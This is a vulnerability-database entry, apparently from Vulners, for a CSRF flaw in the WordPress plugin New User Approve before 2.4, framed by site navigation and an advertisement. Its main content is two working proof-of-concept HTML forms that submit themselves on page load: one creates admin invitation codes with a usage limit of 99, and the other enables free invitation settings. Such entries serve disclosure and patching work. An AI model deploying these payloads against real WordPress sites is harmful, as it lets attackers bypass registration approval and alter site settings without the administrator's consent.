Lucene search

K

New User Approve < 2.4 - Arbitrary Settings Update & Invitation Code Creation via CSRF

πŸ—“οΈΒ 01 Jun 2022Β 00:00:00Reported byΒ Daniel RufTypeΒ 
wpexploit
Β wpexploit
πŸ‘Β 108Β Views

New User Approve - Security Vulnerabilitie

Show more
Related
Code
Add codes:
<form id="test" action="https://example.com/wp-admin/admin.php?page=nua-invitation-code" method="POST">
    <textarea name="nua_manual_add[codes]">test
sesame-open
let-me-in
</textarea>
    <input type="text" name="nua_manual_add[usage_limit]" value="99">
    <input type="text" name="nua_manual_add[expiry_date]" value="2022-04-30">
    <input type="text" name="nua_manual_add[submit]" value="Save Changes">
</form>
<script>
    document.getElementById("test").submit();
</script>


Update Settings:
<form id="test" action="https://example.com/wp-admin/admin.php?page=nua-invitation-code&action=Settings" method="POST">
    <input type="text" name="nua_free_invitation" value="enable">
    <input type="text" name="nua_inv_code_submit" value="Save Changes">
</form>
<script>
    document.getElementById("test").submit();
</script>

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
01 Jun 2022 00:00Current
2Low risk
Vulners AI Score2
EPSS0.001
108
.json
Report